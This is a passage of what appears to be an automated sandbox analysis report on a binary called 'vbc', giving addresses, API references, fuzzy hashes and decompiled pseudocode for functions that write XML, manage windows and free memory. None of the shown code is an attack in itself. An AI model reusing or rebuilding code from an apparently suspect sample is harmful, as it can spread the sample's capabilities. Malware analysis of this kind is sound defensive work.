                                                                                                                                                    0x00407438
                                                                                                                                                    0x00407446
                                                                                                                                                    0x0040744d
                                                                                                                                                    0x00407455
                                                                                                                                                    0x00407459
                                                                                                                                                    0x00407461
                                                                                                                                                    0x00407467
                                                                                                                                                    0x0040749b
                                                                                                                                                    0x0040749b
                                                                                                                                                    0x004074a1
                                                                                                                                                    0x004074ad
                                                                                                                                                    0x004074b6
                                                                                                                                                    0x004074bf
                                                                                                                                                    0x004074d0
                                                                                                                                                    0x004074d7
                                                                                                                                                    0x004074e1
                                                                                                                                                    0x004074e3
                                                                                                                                                    0x004074ed
                                                                                                                                                    0x004074ef
                                                                                                                                                    0x004074ef
                                                                                                                                                    0x004074fc
                                                                                                                                                    0x00407503
                                                                                                                                                    0x0040750a
                                                                                                                                                    0x0040750f
                                                                                                                                                    0x00407512
                                                                                                                                                    0x00407518
                                                                                                                                                    0x00407520
                                                                                                                                                    0x00407530
                                                                                                                                                    0x00407535
                                                                                                                                                    0x00407535
                                                                                                                                                    0x004074e1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00407541
                                                                                                                                                    0x0040746e
                                                                                                                                                    0x00407471
                                                                                                                                                    0x00407472
                                                                                                                                                    0x00407484
                                                                                                                                                    0x00407486
                                                                                                                                                    0x0040748d
                                                                                                                                                    0x0040748e
                                                                                                                                                    0x00407491
                                                                                                                                                    0x00407491
                                                                                                                                                    0x00407492
                                                                                                                                                    0x00407492
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00407472

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeLocalmemcpymemsetstrlen
                                                                                                                                                    • String ID: &v@
                                                                                                                                                    • API String ID: 3110682361-3426253984
                                                                                                                                                    • Opcode ID: 9a1ef4ca1be38dacd8a40183f10fd2ba3c83eed1e3cc7d309a54d2d6fc5753ae
                                                                                                                                                    • Instruction ID: 0225f7a5d6cb17f6a7661d1d380ab710e59dbb599c3936da0c6da93344c8566d
                                                                                                                                                    • Opcode Fuzzy Hash: 9a1ef4ca1be38dacd8a40183f10fd2ba3c83eed1e3cc7d309a54d2d6fc5753ae
                                                                                                                                                    • Instruction Fuzzy Hash: B731F772D0411DABDB10DB68CC81BDEBBB8EF45318F1001B6E645B3281DA78AE858B95
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00409695 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 84%
                                                                                                                                                    			E00409695(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				void _v259;
				char _v260;
				signed int _t34;
				char* _t45;
				void* _t47;

				E00405EFD(_a4, "<item>\r\n");
				_t34 = 0;
				if( *((intOrPtr*)(__edi + 0x20)) > 0) {
					do {
						_v260 = 0;
						memset( &_v259, 0, 0xfe);
						E0040F09D( *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x24)) + _t34 * 4),  *((intOrPtr*)(__edi + 0x4c))),  *((intOrPtr*)(__edi + 0x50)));
						_t45 =  &_v260;
						E00409018(_t45,  *((intOrPtr*)(( *( *((intOrPtr*)(__edi + 0x24)) + _t34 * 4) << 4) +  *((intOrPtr*)(__edi + 0x34)) + 0xc)));
						sprintf( *(__edi + 0x54), "<%s>%s</%s>\r\n", _t45,  *((intOrPtr*)(__edi + 0x50)), _t45);
						E00405EFD(_a4,  *(__edi + 0x54));
						_t47 = _t47 + 0x28;
						_t34 = _t34 + 1;
					} while (_t34 <  *((intOrPtr*)(__edi + 0x20)));
				}
				return E00405EFD(_a4, "</item>\r\n");
			}








                                                                                                                                                    0x004096a7
                                                                                                                                                    0x004096ac
                                                                                                                                                    0x004096b3
                                                                                                                                                    0x004096b6
                                                                                                                                                    0x004096c4
                                                                                                                                                    0x004096cb
                                                                                                                                                    0x004096e7
                                                                                                                                                    0x004096f6
                                                                                                                                                    0x004096fc
                                                                                                                                                    0x00409710
                                                                                                                                                    0x0040971b
                                                                                                                                                    0x00409720
                                                                                                                                                    0x00409723
                                                                                                                                                    0x00409724
                                                                                                                                                    0x00409729
                                                                                                                                                    0x0040973b

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                                                                                                      • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,75144DE0,00000000,?,?,004092ED,00000001,00412B1C,75144DE0), ref: 00405F17
                                                                                                                                                    • memset.MSVCRT ref: 004096CB
                                                                                                                                                      • Part of subcall function 0040F09D: memcpy.MSVCRT ref: 0040F10B
                                                                                                                                                      • Part of subcall function 00409018: strcpy.MSVCRT(00000000,?,00409701,?,?,?), ref: 0040901D
                                                                                                                                                      • Part of subcall function 00409018: _strlwr.MSVCRT ref: 00409060
                                                                                                                                                    • sprintf.MSVCRT ref: 00409710
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileWrite_strlwrmemcpymemsetsprintfstrcpystrlen
                                                                                                                                                    • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                    • API String ID: 3200591283-2769808009
                                                                                                                                                    • Opcode ID: 07c18c0e4a87831351b3b02fe01daf5ffa13d64f31dc98592b1a2e626d7dc146
                                                                                                                                                    • Instruction ID: f0c093cdac9801847eaa7418f237768de61d650e358e632480a4b045718b8cde
                                                                                                                                                    • Opcode Fuzzy Hash: 07c18c0e4a87831351b3b02fe01daf5ffa13d64f31dc98592b1a2e626d7dc146
                                                                                                                                                    • Instruction Fuzzy Hash: FE11E731500515BFC711AF25CC42E967B64FF04318F10006AF549369A2EB76BA64DFD8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00407BF9 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00407BF9(void* __esi, struct HWND__* _a4, signed int _a8) {
				intOrPtr _v12;
				struct tagPOINT _v20;
				struct tagRECT _v36;
				int _t27;
				struct HWND__* _t30;
				struct HWND__* _t32;

				_t30 = _a4;
				if((_a8 & 0x00000001) != 0) {
					_t32 = GetParent(_t30);
					GetWindowRect(_t30,  &_v20);
					GetClientRect(_t32,  &_v36);
					MapWindowPoints(0, _t32,  &_v20, 2);
					_t27 = _v36.right - _v12 - _v36.left;
					_v20.x = _t27;
					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
				}
				if((_a8 & 0x00000002) != 0) {
					E00406560(_t30);
				}
				return 1;
			}









                                                                                                                                                    0x00407c04
                                                                                                                                                    0x00407c07
                                                                                                                                                    0x00407c11
                                                                                                                                                    0x00407c18
                                                                                                                                                    0x00407c23
                                                                                                                                                    0x00407c33
                                                                                                                                                    0x00407c41
                                                                                                                                                    0x00407c49
                                                                                                                                                    0x00407c4f
                                                                                                                                                    0x00407c55
                                                                                                                                                    0x00407c5a
                                                                                                                                                    0x00407c5d
                                                                                                                                                    0x00407c62
                                                                                                                                                    0x00407c68

                                                                                                                                                    APIs
                                                                                                                                                    • GetParent.USER32(?), ref: 00407C0B
                                                                                                                                                    • GetWindowRect.USER32 ref: 00407C18
                                                                                                                                                    • GetClientRect.USER32 ref: 00407C23
                                                                                                                                                    • MapWindowPoints.USER32 ref: 00407C33
                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00407C4F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4247780290-0
                                                                                                                                                    • Opcode ID: 7bea04c1b6e52cb4f5c6b6cbc8acbaaab4948e977a1f04226da639ece1b7c51f
                                                                                                                                                    • Instruction ID: 06ac4e87c023cdd11bbb76a881eefb098f7857fbb12a9e12d40a619b69e20d01
                                                                                                                                                    • Opcode Fuzzy Hash: 7bea04c1b6e52cb4f5c6b6cbc8acbaaab4948e977a1f04226da639ece1b7c51f
                                                                                                                                                    • Instruction Fuzzy Hash: A7014C32800129BBDB119BA5DD89EFF7FBCEF46750F048129F901E2150D7B89541CBA9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040A4C8 Relevance: 7.5, APIs: 5, Instructions: 47windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0040A4C8(void* __eax) {
				void* __esi;
				void* _t16;
				void* _t33;
				void* _t38;
				void* _t41;

				_t41 = __eax;
				_t16 = E00401033();
				if(_t16 == 0x5cb8) {
					SendMessageA( *( *((intOrPtr*)(_t41 + 0x370)) + 0x184), 0xb, 0, 0);
					E00405E2C();
					 *((intOrPtr*)( *((intOrPtr*)(_t41 + 0x370)) + 0x28)) = 0;
					SendMessageA( *( *((intOrPtr*)(_t41 + 0x370)) + 0x184), 0x1009, 0, 0);
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t41 + 0x370)))) + 0x5c))(_t38, _t33);
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t41 + 0x370)))) + 0x74))(1);
					E0040A437(_t41);
					SetCursor( *0x416b98);
					SetFocus( *( *((intOrPtr*)(_t41 + 0x370)) + 0x184));
					return SendMessageA( *( *((intOrPtr*)(_t41 + 0x370)) + 0x184), 0xb, 1, 0);
				}
				return _t16;
			}








                                                                                                                                                    0x0040a4c9
                                                                                                                                                    0x0040a4cb
                                                                                                                                                    0x0040a4d5
                                                                                                                                                    0x0040a4f5
                                                                                                                                                    0x0040a4f7
                                                                                                                                                    0x0040a504
                                                                                                                                                    0x0040a518
                                                                                                                                                    0x0040a522
                                                                                                                                                    0x0040a52f
                                                                                                                                                    0x0040a532
                                                                                                                                                    0x0040a53d
                                                                                                                                                    0x0040a54f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040a569
                                                                                                                                                    0x0040a56b

                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageA.USER32 ref: 0040A4F5
                                                                                                                                                      • Part of subcall function 00405E2C: LoadCursorA.USER32 ref: 00405E33
                                                                                                                                                      • Part of subcall function 00405E2C: SetCursor.USER32(00000000,?,0040BAC6), ref: 00405E3A
                                                                                                                                                    • SendMessageA.USER32 ref: 0040A518
                                                                                                                                                      • Part of subcall function 0040A437: sprintf.MSVCRT ref: 0040A45D
                                                                                                                                                      • Part of subcall function 0040A437: sprintf.MSVCRT ref: 0040A487
                                                                                                                                                      • Part of subcall function 0040A437: strcat.MSVCRT(?,?,?,00000000,00000000), ref: 0040A49A
                                                                                                                                                      • Part of subcall function 0040A437: SendMessageA.USER32 ref: 0040A4C0
                                                                                                                                                    • SetCursor.USER32(?,?,0040B6B6), ref: 0040A53D
                                                                                                                                                    • SetFocus.USER32(?,?,?,0040B6B6), ref: 0040A54F
                                                                                                                                                    • SendMessageA.USER32 ref: 0040A566
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$Cursor$sprintf$FocusLoadstrcat
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2210206837-0
                                                                                                                                                    • Opcode ID: d04c02dfd2683b57df494b0aa3d26c888530678e73924bd562102cacfecd4f7b
                                                                                                                                                    • Instruction ID: 5ceab2a0550c6f7be61398745e2f8fe4621b0361104972d0b8848fcf02267a2c
                                                                                                                                                    • Opcode Fuzzy Hash: d04c02dfd2683b57df494b0aa3d26c888530678e73924bd562102cacfecd4f7b
                                                                                                                                                    • Instruction Fuzzy Hash: 12116DB1200600EFD722AB74DC85FAA77EDFF48344F0644B9F1599B2B1CA716D018B10
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00409867 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 44COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00409867(intOrPtr* __ecx, intOrPtr _a4) {
				void _v259;
				char _v260;
				void _v515;
				char _v516;
				void* __esi;
				void* _t17;
				intOrPtr* _t26;
				char* _t28;

				_t26 = __ecx;
				_v260 = 0;
				memset( &_v259, 0, 0xfe);
				_v516 = 0;
				memset( &_v515, 0, 0xfe);
				E00405EFD(_a4, "<?xml version=\"1.0\"  encoding=\"ISO-8859-1\" ?>\r\n");
				_t17 =  *((intOrPtr*)( *_t26 + 0x20))();
				_t28 =  &_v260;
				E00409018(_t28, _t17);
				sprintf( &_v516, "<%s>\r\n", _t28);
				return E00405EFD(_a4,  &_v516);
			}











                                                                                                                                                    0x00409881
                                                                                                                                                    0x00409883
                                                                                                                                                    0x0040988a
                                                                                                                                                    0x00409899
                                                                                                                                                    0x004098a0
                                                                                                                                                    0x004098ad
                                                                                                                                                    0x004098b9
                                                                                                                                                    0x004098bd
                                                                                                                                                    0x004098c3
                                                                                                                                                    0x004098d7
                                                                                                                                                    0x004098f1

                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 0040988A
                                                                                                                                                    • memset.MSVCRT ref: 004098A0
                                                                                                                                                      • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                                                                                                      • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,75144DE0,00000000,?,?,004092ED,00000001,00412B1C,75144DE0), ref: 00405F17
                                                                                                                                                      • Part of subcall function 00409018: strcpy.MSVCRT(00000000,?,00409701,?,?,?), ref: 0040901D
                                                                                                                                                      • Part of subcall function 00409018: _strlwr.MSVCRT ref: 00409060
                                                                                                                                                    • sprintf.MSVCRT ref: 004098D7
                                                                                                                                                    Strings
                                                                                                                                                    • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 004098A5
                                                                                                                                                    • <%s>, xrefs: 004098D1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memset$FileWrite_strlwrsprintfstrcpystrlen
                                                                                                                                                    • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                    • API String ID: 3202206310-1998499579
                                                                                                                                                    • Opcode ID: 51e994947d23847d28837b494a86f4ec5d5778f6c6bb559d4411b981ab6fcacc
                                                                                                                                                    • Instruction ID: 66925a684df18266fce8bb701fa3a75b356ea9bacad4fe0319972b489c667c97
                                                                                                                                                    • Opcode Fuzzy Hash: 51e994947d23847d28837b494a86f4ec5d5778f6c6bb559d4411b981ab6fcacc
                                                                                                                                                    • Instruction Fuzzy Hash: BC01A77290011976D721A759CC46FDA7B6C9F44304F0400FAB509B3192DB789F858BA8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00408572 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 76%
                                                                                                                                                    			E00408572(void* __esi) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t18;
				void* _t19;

				_t19 = __esi;
				_t9 =  *((intOrPtr*)(__esi + 0x24));
				if(_t9 != 0) {
					_push(_t9);
					L004115D6();
				}
				_t10 =  *((intOrPtr*)(_t19 + 0x34));
				if(_t10 != 0) {
					_push(_t10);
					L004115D6();
				}
				_t11 =  *((intOrPtr*)(_t19 + 0x1b4));
				if(_t11 != 0) {
					_push(_t11);
					L004115D6();
				}
				_t18 =  *((intOrPtr*)(_t19 + 0x1a0));
				if(_t18 != 0) {
					_t11 =  *_t18;
					if(_t11 != 0) {
						_push(_t11);
						L004115D6();
						 *_t18 = 0;
					}
					_push(_t18);
					L004115D6();
				}
				 *((intOrPtr*)(_t19 + 0x1a0)) = 0;
				 *((intOrPtr*)(_t19 + 0x24)) = 0;
				 *((intOrPtr*)(_t19 + 0x34)) = 0;
				 *((intOrPtr*)(_t19 + 0x1b4)) = 0;
				return _t11;
			}








                                                                                                                                                    0x00408572
                                                                                                                                                    0x00408572
                                                                                                                                                    0x0040857b
                                                                                                                                                    0x0040857d
                                                                                                                                                    0x0040857e
                                                                                                                                                    0x00408583
                                                                                                                                                    0x00408584
                                                                                                                                                    0x00408589
                                                                                                                                                    0x0040858b
                                                                                                                                                    0x0040858c
                                                                                                                                                    0x00408591
                                                                                                                                                    0x00408592
                                                                                                                                                    0x0040859a
                                                                                                                                                    0x0040859c
                                                                                                                                                    0x0040859d
                                                                                                                                                    0x004085a2
                                                                                                                                                    0x004085a3
                                                                                                                                                    0x004085ab
                                                                                                                                                    0x004085ad
                                                                                                                                                    0x004085b1
                                                                                                                                                    0x004085b3
                                                                                                                                                    0x004085b4
                                                                                                                                                    0x004085ba
                                                                                                                                                    0x004085ba
                                                                                                                                                    0x004085bc
                                                                                                                                                    0x004085bd
                                                                                                                                                    0x004085c2
                                                                                                                                                    0x004085c4
                                                                                                                                                    0x004085ca
                                                                                                                                                    0x004085cd
                                                                                                                                                    0x004085d0
                                                                                                                                                    0x004085d7

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ??3@
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                    • Opcode ID: adc8f632b908da7283220df0e2c160d15a0e9bb9cd04da95c42ed7d64d4f577a
                                                                                                                                                    • Instruction ID: 0a64c6e0650ef7a992325d71cca8afebdafc0e64b7e6075a64aa0ecb46f153ec
                                                                                                                                                    • Opcode Fuzzy Hash: adc8f632b908da7283220df0e2c160d15a0e9bb9cd04da95c42ed7d64d4f577a
                                                                                                                                                    • Instruction Fuzzy Hash: C2F0F4725057016FDB209F6A99C0497B7D6BB48714B64083FF18AD3741CF78AD818A18
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004085D8 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 70%
                                                                                                                                                    			E004085D8(intOrPtr* __edi) {
				void* __esi;
				void** _t7;
				intOrPtr* _t12;
				intOrPtr* _t18;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;

				_t18 = __edi;
				 *__edi = 0x413320;
				E00408572(__edi);
				_t21 =  *((intOrPtr*)(__edi + 0x10));
				if(_t21 != 0) {
					E00406B5B(_t21);
					_push(_t21);
					L004115D6();
				}
				_t22 =  *((intOrPtr*)(_t18 + 0xc));
				if(_t22 != 0) {
					E00406B5B(_t22);
					_push(_t22);
					L004115D6();
				}
				_t23 =  *((intOrPtr*)(_t18 + 8));
				if(_t23 != 0) {
					E00406B5B(_t23);
					_push(_t23);
					L004115D6();
				}
				_t24 =  *((intOrPtr*)(_t18 + 4));
				if(_t24 != 0) {
					E00406B5B(_t24);
					_push(_t24);
					L004115D6();
				}
				_t12 = _t18;
				_t7 =  *((intOrPtr*)( *_t12))();
				free( *_t7);
				return _t7;
			}











                                                                                                                                                    0x004085d8
                                                                                                                                                    0x004085db
                                                                                                                                                    0x004085e1
                                                                                                                                                    0x004085e6
                                                                                                                                                    0x004085eb
                                                                                                                                                    0x004085ed
                                                                                                                                                    0x004085f2
                                                                                                                                                    0x004085f3
                                                                                                                                                    0x004085f8
                                                                                                                                                    0x004085f9
                                                                                                                                                    0x004085fe
                                                                                                                                                    0x00408600
                                                                                                                                                    0x00408605
                                                                                                                                                    0x00408606
                                                                                                                                                    0x0040860b
                                                                                                                                                    0x0040860c
                                                                                                                                                    0x00408611
                                                                                                                                                    0x00408613
                                                                                                                                                    0x00408618
                                                                                                                                                    0x00408619
                                                                                                                                                    0x0040861e
                                                                                                                                                    0x0040861f
                                                                                                                                                    0x00408624
                                                                                                                                                    0x00408626
                                                                                                                                                    0x0040862b
                                                                                                                                                    0x0040862c
                                                                                                                                                    0x00408631
                                                                                                                                                    0x00408632
                                                                                                                                                    0x0040863c
                                                                                                                                                    0x00408640
                                                                                                                                                    0x00408646

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040857E
                                                                                                                                                      • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040858C
                                                                                                                                                      • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040859D
                                                                                                                                                      • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 004085B4
                                                                                                                                                      • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 004085BD
                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 004085F3
                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00408606
                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00408619
                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040862C
                                                                                                                                                    • free.MSVCRT(00000000), ref: 00408640
                                                                                                                                                      • Part of subcall function 00406B5B: free.MSVCRT(00000000,00406DE2,00000000,?,?), ref: 00406B62
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ??3@$free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2241099983-0
                                                                                                                                                    • Opcode ID: 0216321c22edde0e428b6460b65a4d9d3fdf50d22b04996e8803d6d71622e83e
                                                                                                                                                    • Instruction ID: 9ddd328a78e70669a2f2a4495a49ad6ad9a3331e0dda25fcf26d4743fc91c851
                                                                                                                                                    • Opcode Fuzzy Hash: 0216321c22edde0e428b6460b65a4d9d3fdf50d22b04996e8803d6d71622e83e
                                                                                                                                                    • Instruction Fuzzy Hash: E3F0F6729028306BC9213B275011A8EB3657D4171431B056FF946BB7A28F3C6E9246FD
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040E81A Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 19%
                                                                                                                                                    			E0040E81A(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, intOrPtr _a12) {
				void* __esi;
				void* _t11;
				void* _t26;
				void* _t27;

				_t26 = __edx;
				_t11 = _a4 - 0x110;
				_t27 = __ecx;
				if(_t11 == 0) {
					E0040E4A4(__ecx, __ecx, __eflags);
					E00406491(_t26,  *((intOrPtr*)(__ecx + 4)));
					L5:
					return E004015AE(_t27, _a4, _a8, _a12);
				}
				if(_t11 != 0x28 || E004062D1(_a12) == 0) {
					goto L5;
				} else {
					SetBkMode(_a8, 1);
					SetBkColor(_a8, GetSysColor(5));
					SetTextColor(_a8, 0xc00000);
					return GetSysColorBrush(5);
				}
			}







                                                                                                                                                    0x0040e81a
                                                                                                                                                    0x0040e820
                                                                                                                                                    0x0040e826
                                                                                                                                                    0x0040e828
                                                                                                                                                    0x0040e871
                                                                                                                                                    0x0040e879
                                                                                                                                                    0x0040e87f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040e88a
                                                                                                                                                    0x0040e82d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040e83c
                                                                                                                                                    0x0040e841
                                                                                                                                                    0x0040e853
                                                                                                                                                    0x0040e861
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040e869

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004062D1: memset.MSVCRT ref: 004062F1
                                                                                                                                                      • Part of subcall function 004062D1: GetClassNameA.USER32(?,00000000,000000FF), ref: 00406304
                                                                                                                                                      • Part of subcall function 004062D1: _stricmp.MSVCRT(00000000,edit), ref: 00406316
                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 0040E841
                                                                                                                                                    • GetSysColor.USER32(00000005), ref: 0040E849
                                                                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 0040E853
                                                                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 0040E861
                                                                                                                                                    • GetSysColorBrush.USER32(00000005), ref: 0040E869
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Color$BrushClassModeNameText_stricmpmemset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1869857563-0
                                                                                                                                                    • Opcode ID: fa2efa1d352e815f872068aeb743c84bb0f55ba64056062ab12fb6989f15ddc0
                                                                                                                                                    • Instruction ID: 70d3a7b2db974a4d4567ef1bfe72cf66993607b5e30e9ab541cb73924f0fe55d
                                                                                                                                                    • Opcode Fuzzy Hash: fa2efa1d352e815f872068aeb743c84bb0f55ba64056062ab12fb6989f15ddc0
                                                                                                                                                    • Instruction Fuzzy Hash: 8CF01D32100205BBDF152FA6DD09E9E3F25EF08711F10C53AFA19A51E1CAB5D970DB58
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040B105 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                    			E0040B105(intOrPtr __ecx, short _a4, short _a8) {
				char _v265;
				char _v520;
				char _v532;
				RECT* _v540;
				char _v560;
				intOrPtr _v564;
				char _v568;
				intOrPtr _v572;
				void* __ebx;
				void* __edi;
				void* __esi;
				int _t54;
				void* _t77;
				short _t85;
				short _t86;
				RECT* _t97;
				intOrPtr _t104;

				_t93 = __ecx;
				_t97 = 0;
				_t104 = __ecx;
				_v564 = __ecx;
				if(_a4 == 0 || _a4 == 1) {
					_t85 = _a8;
					if(_t85 == 0x9c42) {
						_t54 = DestroyWindow( *(_t104 + 0x108));
					}
					_t114 = _t85 - 0x9c49;
					if(_t85 == 0x9c49) {
						_t54 = E0040AEAA(_t93, _t97, _t104, _t114);
					}
					_t115 = _t85 - 0x9c59;
					if(_t85 == 0x9c59) {
						_t54 = E0040AE70(_t97, _t104, _t115);
					}
					_t116 = _t85 - 0x9c56;
					if(_t85 == 0x9c56) {
